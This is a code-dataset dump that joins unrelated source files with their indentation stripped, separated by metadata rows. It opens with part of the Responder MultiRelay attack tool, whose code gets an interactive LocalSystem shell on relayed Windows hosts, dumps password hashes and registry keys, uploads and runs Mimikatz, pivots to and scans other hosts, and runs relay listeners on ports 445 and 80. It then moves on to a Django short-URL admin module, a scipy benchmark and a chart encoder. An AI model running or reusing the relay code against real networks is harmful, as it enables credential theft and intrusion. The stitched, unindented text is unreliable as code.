if Pivoting[0] == "1":
pass
else:
print("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
## Run one command.
if data[8:10] == b'\x75\x00' and OneCommand != None or Dump:
print("[+] Authenticated.")
if OneCommand != None:
print("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print("[+] Dumping hashes")
DumpHashes(data, s, Target[0])
os._exit(1)
## Drop into the shell.
if data[8:10] == b'\x75\x00' and OneCommand == None:
if Pivoting[0] == "1":
pass
else:
print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True:
## We either just arrived here or we're back from a command operation, let's setup some stuff.
if data[8:10] == b'\x75\x00':
#start a thread for raw_input, so we can do other stuff while we wait for a command.
t = Thread(target=get_command, args=())
t.daemon = True
t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well.
count = 0
DoEvery = random.randint(10, 45)
while any(x in Cmd for x in Cmd) is False:
count = count+1
SMBKeepAlive(s, data)
if count == DoEvery:
DumbSMBChain(data, s, Target[0])
count = 0
if any(x in Cmd for x in Cmd) is True:
break
##Grab the commands. Cmd is global in get_command().
DumpReg = re.findall('^dump', Cmd[0])
Read = re.findall('^read (.*)$', Cmd[0])
RegDump = re.findall('^regdump (.*)$', Cmd[0])
Get = re.findall('^get (.*)$', Cmd[0])
Upload = re.findall('^upload (.*)$', Cmd[0])
Delete = re.findall('^delete (.*)$', Cmd[0])
RunAs = re.findall('^runas (.*)$', Cmd[0])
LCmd = re.findall('^lcmd (.*)$', Cmd[0])
Mimi = re.findall('^mimi (.*)$', Cmd[0])
Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0])
Scan = re.findall('^scan (.*)$', Cmd[0])
Pivot = re.findall('^pivot (.*)$', Cmd[0])
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print("[+] Returning in relay mode.")
del Cmd[:]
del ShellOpen[:]
return None
##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done.
if DumpReg:
data = DumpHashes(data, s, Target[0])
del Cmd[:]
if Read:
File = Read[0]
data = ReadFile(data, s, File, Target[0])
del Cmd[:]
if Get:
File = Get[0]
data = GetAfFile(data, s, File, Target[0])
del Cmd[:]
if Upload:
File = Upload[0]
if os.path.isfile(File):
FileSize, FileContent = UploadContent(File)
File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print(File+" does not exist, please specify a valid file.")
del Cmd[:]
if Delete:
Filename = Delete[0]
data = DeleteFile(data, s, Filename, Target[0])
del Cmd[:]
if RegDump:
Key = RegDump[0]
data = SaveAKey(data, s, Target[0], Key)
del Cmd[:]
if RunAs:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = RunAs[0]
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if LCmd:
subprocess.call(LCmd[0], shell=True)
del Cmd[:]
if Mimi:
if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:]
if Mimi32:
if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi32[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print(Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:]
del Cmd[:]
else:
if ShowSigning(Pivot[0]):
del Pivot[:]
del Cmd[:]
else:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
RunAsPath = '%windir%\\Temp\\'+FileName
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True:
print("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close.
del ShellOpen[:]
#update the new host.
Host = [Pivot[0]]
#we're in pivoting mode.
Pivoting = ["1"]
data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
del Cmd[:]
s.close()
return None
if Status == False:
print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:]
del Pivot[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if Scan:
LocalIp = FindLocalIp()
Range = ConvertToClassC(Target[0], Scan[0])
RunPivotScan(Range, Target[0])
del Cmd[:]
if Help:
ShowHelp()
del Cmd[:]
##Let go with the command.
if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print(SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if isinstance(data, str):
data = data.encode('latin-1')
if data is None:
print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
class ThreadingTCPServer(TCPServer):
def server_bind(self):
TCPServer.server_bind(self)
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.daemon_threads = True
def serve_thread_tcp(host, port, handler):
try:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
try:
threads = []
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
if ExtraPort != 0:
threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
while True:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
##This is a bug in python readline when dealing with raw_input()..
if ShellOpen:
os.system('stty sane')
##Then exit
sys.exit("\rExiting...")
if __name__ == '__main__':
main()
| gpl-3.0 | 4,106,894,401,780,348,400 | 45.454865 | 199 | 0.554434 | false |
martingms/django-globalshorturls | globalshorturls/admin/contrib.py | 1 | 2513 | # encoding: utf-8
from django.contrib.admin import site, ModelAdmin
from globalshorturls.models import Shorturl
from django.forms import ModelForm
from django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec
from django.utils.translation import ugettext as _
from django.utils.encoding import smart_unicode
# The list of objects can get extremely long. This filter spec overrides
# the default filter for fields that set an extra attribute, so that only
# objects actually existing in the database are offered as filter choices.
# Taken from: http://djangosnippets.org/snippets/1879/
class CustomChoiceFilterSpec(ChoicesFilterSpec):
def __init__(self, f, request, params, model, model_admin):
super(CustomChoiceFilterSpec, self).__init__(f, request, params, model, model_admin)
self.lookup_kwarg = '%s__id__exact' % f.name
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.objects = model.objects.all()
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
items = [i.creator for i in self.objects]
items = list(set(items))
for k in items:
yield {'selected': smart_unicode(k) == self.lookup_val,
'query_string': cl.get_query_string({self.lookup_kwarg: k.id}),
'display': k}
FilterSpec.filter_specs.insert(0, (lambda f: getattr(f, 'compact_filter', False), CustomChoiceFilterSpec))
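# Illustrative usage (an assumption, not part of the original snippet): a model
# field opts into this filter spec by carrying the 'compact_filter' attribute
# checked in the lambda above, e.g.:
#
# creator = models.ForeignKey(User)
# creator.compact_filter = True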
# This form is identical to the ShorturlForm in models.py, but I keep them separate so that it is possible to change them
# without interfering with the other
class ShorturlAdminForm(ModelForm):
class Meta:
model = Shorturl
def clean_url(self):
url = self.cleaned_data['url']
if url.startswith('http'):
return url
else:
return 'http://'+url
class ShorturlAdmin(ModelAdmin):
# You might want to add has_change_permission and has_delete_permission here if anyone but staff can view admin
form = ShorturlAdminForm
fields = ('url',)
search_fields = ['url']
list_display = ('url', 'full_shorturl', 'creator', 'counter',)
list_filter = ('creator',)
def save_model(self, request, obj, form, change):
if not obj.creator:
obj.creator = request.user
obj.save()
site.register(Shorturl, ShorturlAdmin) | mit | 8,428,196,929,774,937,000 | 37.676923 | 121 | 0.671707 | false |
dominicelse/scipy | benchmarks/benchmarks/sparse_linalg_solve.py | 30 | 2163 | """
Check the speed of several linear solvers (dense solve, spsolve, cg, minres,
lgmres) on a 2-D Poisson problem.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_equal
try:
from scipy import linalg, sparse
from scipy.sparse.linalg import cg, minres, spsolve
except ImportError:
pass
try:
from scipy.sparse.linalg import lgmres
except ImportError:
pass
from .common import Benchmark
def _create_sparse_poisson1d(n):
# Make Gilbert Strang's favorite matrix
# http://www-math.mit.edu/~gs/PIX/cupcakematrix.jpg
P1d = sparse.diags([[-1]*(n-1), [2]*n, [-1]*(n-1)], [-1, 0, 1])
assert_equal(P1d.shape, (n, n))
return P1d
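# For example, _create_sparse_poisson1d(4).toarray() gives the tridiagonal
# matrix
#   [[ 2., -1.,  0.,  0.],
#    [-1.,  2., -1.,  0.],
#    [ 0., -1.,  2., -1.],
#    [ 0.,  0., -1.,  2.]]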
def _create_sparse_poisson2d(n):
P1d = _create_sparse_poisson1d(n)
P2d = sparse.kronsum(P1d, P1d)
assert_equal(P2d.shape, (n*n, n*n))
return P2d.tocsr()
class Bench(Benchmark):
params = [
[4, 6, 10, 16, 25, 40, 64, 100],
['dense', 'spsolve', 'cg', 'minres', 'lgmres']
]
param_names = ['(n,n)', 'solver']
def setup(self, n, solver):
if solver == 'dense' and n >= 25:
raise NotImplementedError()
self.b = np.ones(n*n)
self.P_sparse = _create_sparse_poisson2d(n)
if solver == 'dense':
self.P_dense = self.P_sparse.A
def time_solve(self, n, solver):
if solver == 'dense':
linalg.solve(self.P_dense, self.b)
elif solver == 'cg':
cg(self.P_sparse, self.b)
elif solver == 'minres':
minres(self.P_sparse, self.b)
elif solver == 'lgmres':
lgmres(self.P_sparse, self.b)
elif solver == 'spsolve':
spsolve(self.P_sparse, self.b)
else:
raise ValueError('Unknown solver: %r' % solver)
class Lgmres(Benchmark):
params = [
[10, 50, 100, 1000, 10000],
[10, 30, 60, 90, 180],
]
param_names = ['n', 'm']
def setup(self, n, m):
np.random.seed(1234)
self.A = sparse.eye(n, n) + sparse.rand(n, n, density=0.01)
self.b = np.ones(n)
def time_inner(self, n, m):
lgmres(self.A, self.b, inner_m=m, maxiter=1)
| bsd-3-clause | -5,272,682,686,121,058,000 | 25.060241 | 67 | 0.574202 | false |
dencee/AWG | AWG_App_py3.py | 1 | 19683 | # Title: AWG - Akemi's Word Game
# Author: Daniel Commins
# Date: June 13, 2015
# Files: AWG_App_py3.py; EASY.TXT, HARD.TXT (dictionary word files)
# Requires: Python 3 (tkinter)
# Info: Akemi's Word Game: The game where you try and guess the computer's randomly
# selected word! Each letter appears only once.
import sys
import random
import tkinter
import tkinter.messagebox
GAME_VERSION = "1.3"
class CurGuess_t :
def __init__(self) :
self.entry = None
self.button = None
class PastGuesses_t :
def __init__(self) :
self.pastGuess = None
self.result = None
self.guess = None
self.matches = None
class WordGame_tk( tkinter.Tk ) :
entryWidth = 30 # in chars
guessStartRow = 8 # using grid()
dictWordListEasy = None # only needs to be read once for all instances
dictWordListHard = None # only needs to be read once for all instances
def __init__( self, parent ):
tkinter.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.minLetters = 4
self.maxLetters = 12
self.maxAttempts = 10
self.numLetters = None # number of letters in word once game starts
self.numGuesses = None # number of guesses at word once game starts
self.curGuessNum = None # tracks users guesses so far
self.curGuess = CurGuess_t() # contains widget for the user entry widgets
self.guesses = [PastGuesses_t() for i in range( self.maxAttempts )] # one for each guess that can be made
self.statusText = tkinter.StringVar() # string message on the status line
self.statusLabel = None # status label widget
self.randomWord = None # randomly selected word from dictionary
self.wordList = list() # stores words from dictionary of the specified length
self.pluralCheckVal = tkinter.IntVar() # stores value from user option to include word plurals
self.exSpacesCheckVal = tkinter.IntVar()# stores value from user option to include extra spaces in result
self.difficultyVal = tkinter.IntVar() # stores the game difficulty level
self.checkPlurals = None # stores the plural check option when game starts
self.extraSpaces = None # stores the option to add a space every character in result
self.difficulty = None # stores the game difficulty level when the game starts
# Open and read large words file once if necessary
self.ReadWordsFile()
# Set grid geometry
self.grid()
# Plural checkbox; enable by default
pluralCheckButton = tkinter.Checkbutton( self, text="omit 's'/'es' plurals", variable=self.pluralCheckVal, onvalue=1, offvalue=0 )
pluralCheckButton.grid( row=0, column=0, sticky='w' )
pluralCheckButton.select()
# Extra spaces checkbox; disable by default
extraSpacesCheckButton = tkinter.Checkbutton( self, text="extra spaces", variable=self.exSpacesCheckVal, onvalue=1, offvalue=0 )
extraSpacesCheckButton.grid( row=0, column=0, sticky='e' )
extraSpacesCheckButton.deselect()
# Info button
infoButton = tkinter.Button( self, text="Info", borderwidth=0, justify='center', command=self.OnInfo )
infoButton.grid( row=0, column=1, sticky='n', rowspan=1 )
# Game difficulty level radio buttons
radioButton = tkinter.Radiobutton( self, text="Easy", variable=self.difficultyVal, value=0 )
radioButton.grid( row=1, column=0, sticky='w' )
radioButton = tkinter.Radiobutton( self, text="Hard", variable=self.difficultyVal, value=2)
radioButton.grid( row=1, column=0, sticky='' )
# Number of letters option
lettersText = tkinter.Label( self, anchor='w', text="Number of Letters [%d-%d]" %(self.minLetters, self.maxLetters) )
lettersText.grid( row=2, column=0, sticky='w' )
self.lettersEntry = tkinter.Spinbox( self, from_=self.minLetters, to=self.maxLetters, width=3 )
self.lettersEntry.grid( row=2, column=1, sticky='w' )
self.lettersEntry.delete( 0, 3 )
self.lettersEntry.insert( 0, '5' )
# Number of guesses option
numGuessesText = tkinter.Label( self, anchor="w", text="Number of Guesses [1-%d]" %(self.maxAttempts) )
numGuessesText.grid( row=3, column=0, sticky='w' )
self.guessesEntry = tkinter.Spinbox( self, from_="1", to=self.maxAttempts, width=3 )
self.guessesEntry.grid( row=3, column=1, sticky='w' )
self.guessesEntry.delete( 0, 3 )
self.guessesEntry.insert( 0, '5' )
# Statement of rules
legendText1 = tkinter.Label( self, anchor='center', text="*Each letter is used only once*", borderwidth=0, bg='yellow', padx=4, width=WordGame_tk.entryWidth )
legendText2 = tkinter.Label( self, anchor='w', text="O = right letter, wrong location", borderwidth=0, bg='cyan', padx=4, width=WordGame_tk.entryWidth )
legendText3 = tkinter.Label( self, anchor='w', text="\u25b2 = right letter, right location", borderwidth=0, bg='green', padx=4, width=WordGame_tk.entryWidth )
legendText4 = tkinter.Label( self, anchor='w', text="_ = letter not in word", borderwidth=0, bg='red', padx=4, width=WordGame_tk.entryWidth )
legendText1.grid( row=4, column=0, sticky='w' )
legendText2.grid( row=5, column=0, sticky='w' )
legendText3.grid( row=6, column=0, sticky='w' )
legendText4.grid( row=7, column=0, sticky='w' )
# Quit button
quitButton = tkinter.Button( self, text="Exit", borderwidth=0, justify='center', width=len('Start'), command=self.OnExit )
quitButton.grid( row=5, column=1, sticky='n', rowspan=2 )
# Game start button
startButton = tkinter.Button( self, text="Start", borderwidth=0, justify='center', width=len('Start'), command=self.OnStart )
startButton.grid( row=6, column=1, sticky='s', rowspan=2 )
def OnInfo(self) :
infoString = "==Akemi's Word Game v" + GAME_VERSION + "=="
infoString = infoString + "\n\nThe game where you try and guess"
infoString = infoString + "\nthe randomly generated word!"
infoString = infoString + "\n\nGame originally hosted on Github:"
infoString = infoString + "\nhttps://github.com/dencee/AWG"
infoString = infoString + "\n\nHave Fun!!!"
tkinter.messagebox.showinfo( "AWG Info", infoString )
def OnExit(self) :
self.destroy() # So dramatic!
def OnStart(self) :
# Get plural option only once when the game starts so the value can't be adjusted mid-game
self.checkPlurals = self.pluralCheckVal.get()
# Get extra spaces option
self.extraSpaces = self.exSpacesCheckVal.get()
# Get the game difficulty
self.difficulty = self.difficultyVal.get()
# Get number of guesses and letters here only ONCE when the game starts
try :
self.numLetters = int( self.lettersEntry.get() )
except :
self.numLetters = None
try :
self.numGuesses = int( self.guessesEntry.get() )
except :
self.numGuesses = None
# Check for valid input parameters and get random word
if ( self.numGuesses == None or self.numGuesses > self.maxAttempts or self.numGuesses <= 0 or
self.numLetters == None or self.numLetters > self.maxLetters or self.numLetters < self.minLetters ) :
statusText = "Invalid input parameters!"
self.numLetters = None
self.numGuesses = None
else :
statusText = "Guess the '%d' letter word!" %(self.numLetters)
if ( self.difficulty == 0 ) :
self.randomWord = self.GetRandomWord( WordGame_tk.dictWordListEasy, self.numLetters )
else :
self.randomWord = self.GetRandomWord( WordGame_tk.dictWordListHard, self.numLetters )
# Reset the number of guesses that've been made
self.curGuessNum = 0
startRow = WordGame_tk.guessStartRow
# Print status label if necessary
if self.statusLabel == None :
self.statusLabel = tkinter.Label( self, textvariable=self.statusText, borderwidth=0, width=WordGame_tk.entryWidth )
self.statusLabel.grid( row=startRow, column=0 )
else :
self.statusLabel.grid()
self.statusText.set( statusText )
startRow = ( startRow + 1 )
# Print user guess entry field if necessary
if self.numLetters != None :
if self.curGuess.entry == None :
self.curGuess.entry = tkinter.Entry( self, borderwidth=0, width=WordGame_tk.entryWidth, bg='gray80', state='normal' )
self.curGuess.entry.insert( 0, "<Enter Guess>" )
self.curGuess.entry.grid( row=startRow, column=0 )
else :
self.curGuess.entry.grid()
self.curGuess.entry.delete( 0, 'end' )
# Print the user guess button if necessary
if self.numLetters != None :
if self.curGuess.button == None :
self.curGuess.button = tkinter.Button( self, text="Guess", borderwidth=0, justify='center', width=len('Start'), command=self.OnGuess )
self.curGuess.button.grid( row=startRow-1, column=1, sticky='s', rowspan=2 ) # -1 because rowspan=2
else :
self.curGuess.button.grid()
startRow = ( startRow + 1 )
# First time 'Start' is pressed, create all the guess entries and leave them blank
# TODO: Possibly reverse the if and for statements
if self.guesses[0].pastGuess == None :
for eachGuess in range( self.maxAttempts ) :
self.guesses[eachGuess].guess = tkinter.StringVar()
self.guesses[eachGuess].matches = tkinter.StringVar()
self.guesses[eachGuess].guess.set( "" )
self.guesses[eachGuess].matches.set( "" )
self.guesses[eachGuess].pastGuess = tkinter.Label( self, textvariable=self.guesses[eachGuess].guess, borderwidth=0, anchor='w', width=WordGame_tk.entryWidth )
self.guesses[eachGuess].result = tkinter.Label( self, textvariable=self.guesses[eachGuess].matches, borderwidth=0, anchor='w', width=WordGame_tk.entryWidth )
self.guesses[eachGuess].pastGuess.grid( row=startRow, column=0 )
self.guesses[eachGuess].result.grid( row=(startRow+1), column=0 )
startRow = ( startRow + 2 )
# Show and hide the guess entries based on how many guesses the user selected
for eachGuess in range( self.maxAttempts ) :
# Clear all previous guess and result data output
self.guesses[eachGuess].guess.set( "" )
self.guesses[eachGuess].matches.set( "" )
if eachGuess < self.numGuesses :
# Show the guess entry
self.guesses[eachGuess].pastGuess.grid()
self.guesses[eachGuess].result.grid()
else :
# Hide the guess entry
self.guesses[eachGuess].pastGuess.grid_remove()
self.guesses[eachGuess].result.grid_remove()
def OnGuess(self) :
# Check users guess string
userGuess = self.curGuess.entry.get().lower()
# Check for valid word length
if len(userGuess) != self.numLetters :
self.statusText.set( "Error: Please input '%d' letters" %(self.numLetters) )
else :
# Note - want to allow repeating letters because user may be trying to guess
# the location of one of the letters
invalidLetter = False
for letter in userGuess :
if ( ( letter < 'a' ) or ( letter > 'z' ) ) :
invalidLetter = True
break
# Check valid symbols
if invalidLetter == True :
self.statusText.set( "Error: Invalid symbols in word" )
else :
# Valid entry! Check letter matches with the random word
resultList = list()
wrongLetters = 0
# Loop letters in guess word, checking letter in word, then correct position
for index, letter in enumerate( userGuess ) :
if letter in self.randomWord :
if ( userGuess[index] == self.randomWord[index] ) :
resultList.append("\u25b2") # unicode char for triangle
else :
resultList.append("O")
wrongLetters = wrongLetters + 1
else :
resultList.append("_")
wrongLetters = wrongLetters + 1
if self.extraSpaces != 0 :
# Skip space every character for readability
if len( resultList ) != 0 :
resultList.append(" ")
if wrongLetters == 0 :
# Correct guess!
self.OnMatch()
else :
# Incorrect guess! Print the resulting letter matches.
# String join method to convert list of chars to string
guessNumStr = "%2d: " %(self.curGuessNum+1)
# "00: "
self.guesses[self.curGuessNum].matches.set( " "+"".join(resultList) )
self.guesses[self.curGuessNum].guess.set( guessNumStr+userGuess )
self.curGuessNum = ( self.curGuessNum + 1 )
if self.curGuessNum < int( self.numGuesses ) :
# Still more chances to guess...
self.statusText.set( "<Guess %d/%d>" %((self.curGuessNum+1), self.numGuesses ) )
self.curGuess.entry.delete( 0, 'end' )
else :
# No more chances, game over :(
self.statusText.set( "Random word was: "+self.randomWord )
self.curGuess.button.grid_remove()
def GetRandomWord( self, listOfWords, numLetters ) :
randomWord = None
# TODO: optimize so that the list doesn't have to be re-created
# if the same number of letters are chosen
del self.wordList[:]
# Loop through all words in the dictionary file (SINGLE.TXT) to extract the ones
# matching the game criteria
for index, word in enumerate( listOfWords ) :
if ( len(word) == numLetters ) :
lettersInWord = dict()
# Loop through all the letters and,
# 1) check it's a valid lowercase letter
# 2) count the occurrence of each letter--it's illegal to have a
# letter occur more than once in a word
for letter in word :
if ( ( letter < 'a' ) or ( letter > 'z' ) ) :
# Word can only contain lower-case letters: no pronouns,
# apostrophes, accents, etc. stop checking other letters if found
break
# TODO: Don't really need to keep track of the number of occurrences
# since I'm just looking at dictionary length size.
lettersInWord[letter] = lettersInWord.get( letter, 0 ) + 1
# Check only 1 instance of each letter:
# If each letter occurred only once, then the dictionary size will be
# equal to the length of the word string that was read
if len(lettersInWord) == len(word) :
# 0 = box not checked (include plurals); 1 = box checked (omit plurals)
if self.checkPlurals != 0 :
# Want to determine if this word is a plural so look back in the sorted
# dictionary list and grab some of the words before it. If there's
# the same word without an 's' or 'es' at the end, this word's a plural
if index > 10 :
startIndex = ( index - 10 )
else :
startIndex = 0
pastWords = tuple( listOfWords[ startIndex : index ] )
# Check for plural words ending in 's':
# if word ends in an 's' and there's the same word without an 's' at the
                        # end then consider this word a plural. Not 100% accurate, but given the
# size of the word list file it's acceptable.
if ( word[len(word)-1] == 's' ) and ( word[ : (len(word)-1) ] in pastWords ) :
continue # continue, not break--still searching for other words
# Check for plural words ending in 'es':
# Same for plurals ending in 's'
if ( word[ (len(word)-2) : ] == 'es' ) and ( word[ : (len(word)-2) ] in pastWords ) :
continue # continue, not break--still searching for other words
# Valid word found...Finally!
self.wordList.append(word)
# Make sure the list is populated with words
if ( len(self.wordList) != 0 ) :
randomIndex = random.randint( 0, ( len( self.wordList ) - 1 ) )
randomWord = self.wordList[ randomIndex ]
return ( randomWord )
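    # Illustrative example of the plural filter in GetRandomWord, assuming the
    # words involved all appear in the sorted list: "cars" is skipped because
    # "car" occurs among the preceding entries, and "boxes" is skipped because
    # "box" does; a word like "cargo" is kept since neither rule applies.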
def OnMatch(self) :
self.statusText.set( "Correct guess, YOU WIN!!!" )
self.curGuess.button.grid_remove()
def ReadWordsFile(self) :
# Only need to be read once
if ( WordGame_tk.dictWordListEasy == None ) :
fileHandle = None
wordFile = "EASY.TXT"
# 'with' statement will automatically close the file afterwards
with open(wordFile) as fileHandle :
# Populate list with all words read from file
WordGame_tk.dictWordListEasy = fileHandle.read().splitlines()
# Sort the list so it'll be easier to find plurals
WordGame_tk.dictWordListEasy.sort()
# Only need to be read once
if ( WordGame_tk.dictWordListHard == None ) :
fileHandle = None
wordFile = "HARD.TXT"
# 'with' statement will automatically close the file afterwards
with open(wordFile) as fileHandle :
# Populate list with all words read from file
WordGame_tk.dictWordListHard = fileHandle.read().splitlines()
# Sort the list so it'll be easier to find plurals
WordGame_tk.dictWordListHard.sort()
if __name__ == '__main__':
game = WordGame_tk(None)
game.title("Akemi's Word Game")
game.mainloop()
| mit | 3,234,303,404,919,293,000 | 48.581864 | 174 | 0.564396 | false |
jevgen/namebench | nb_third_party/graphy/backends/google_chart_api/encoders.py | 230 | 14800 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users; use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
    formatters: List of bound formatter methods; each takes the formatted
                chart and returns a dict of Google Chart API parameters,
                which _Params merges to build the final URL. These URL-level
                formatters are distinct from the chart formatters applied via
                chart.GetFormattedChart().
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, URL will be properly escaped. If False, characters
like | and , will be unescapped (which makes the URL easier to
read).
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&, <, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
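  # Illustrative usage (an assumption -- encoders are normally obtained via the
  # helper methods in graphy.backends.google_chart_api rather than constructed
  # directly):
  #
  #   encoder = LineChartEncoder(chart)
  #   url = encoder.Url(400, 200)  # -> http://chart.apis.google.com/chart?...
  #   tag = encoder.Img(400, 200)  # -> <img src="..." width="400" .../>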
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
